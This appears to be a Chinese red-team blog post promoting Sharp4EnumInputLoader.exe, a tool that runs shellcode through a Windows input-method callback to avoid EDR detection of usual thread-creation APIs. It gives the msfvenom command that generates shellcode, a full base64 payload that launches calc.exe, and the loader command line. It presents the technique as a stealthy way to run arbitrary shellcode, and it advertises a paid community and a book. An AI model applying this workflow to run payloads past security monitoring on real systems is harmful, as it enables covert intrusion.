在红队实战中,绕过防护、执行 Shellcode 是最基础也最关键的一环。传统的 Shellcode 执行方式多通过 CreateThread、QueueUserAPC 等典型 API 来启动,但这些方式早已被众多 EDR 产品重点检测。如何寻找一条不常见的 Shellcode 加载路径,成为研究与实践的重要方向。
Sharp4EnumInputLoader.exe,是一款基于不常用 API 实现的 Shellcode 执行工具,是绕过常规线程创建行为、调用路径,借助 Windows 输入法组件中的回调机制触发 Shellcode 的执行。
可以使用 msfvenom、donut 或 sRDI 工具生成任意 Windows Shellcode,具体命令如下所示。
msfvenom -p windows/x64/exec CMD=calc.exe -f raw | base64
将输出的 Base64 复制备用,具体 payload 如下所示。
/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA==
在命令行下启动 Sharp4EnumInputLoader.exe,输入参数后回车,此时,目标 payload,例如 calc.exe 将被触发执行。
Sharp4EnumInputLoader.exe /OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA==
Sharp4EnumInputLoader 工具充分体现了红队思维下利用输入法 API ,悄无声息地执行任意 Shellcode,规避了传统行为特征与监控机制,在提升隐蔽性和成功率上极具实用价值。文章涉及的工具已打包在星球,感兴趣的朋友可以加入自取。以上相关的知识点已收录于新书《.NET安全攻防指南》,全书共计25章,总计1010页,分为上下册,横跨.NET Web代码审计与红队渗透两大领域。
上册深入剖析.NET Web安全审计的核心技术,帮助读者掌握漏洞发现与修复的精髓;下册则聚焦于.NET逆向工程与攻防对抗的实战技巧,揭秘最新的对抗策略与技术方法。
从漏洞分析到安全攻防,我们涵盖了 .NET 安全各个关键方面,为您呈现最新、最全面的 .NET 安全知识,下面是公众号发布的精华文章集合,推荐大伙阅读!
20+专栏文章
海量资源和工具
本文所涉及工具与方法仅供合法授权的安全测试与研究使用,禁止任何非法用途,违者自负法律责任。专属成员交流群
已入驻的大咖们
欢迎加入我们
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...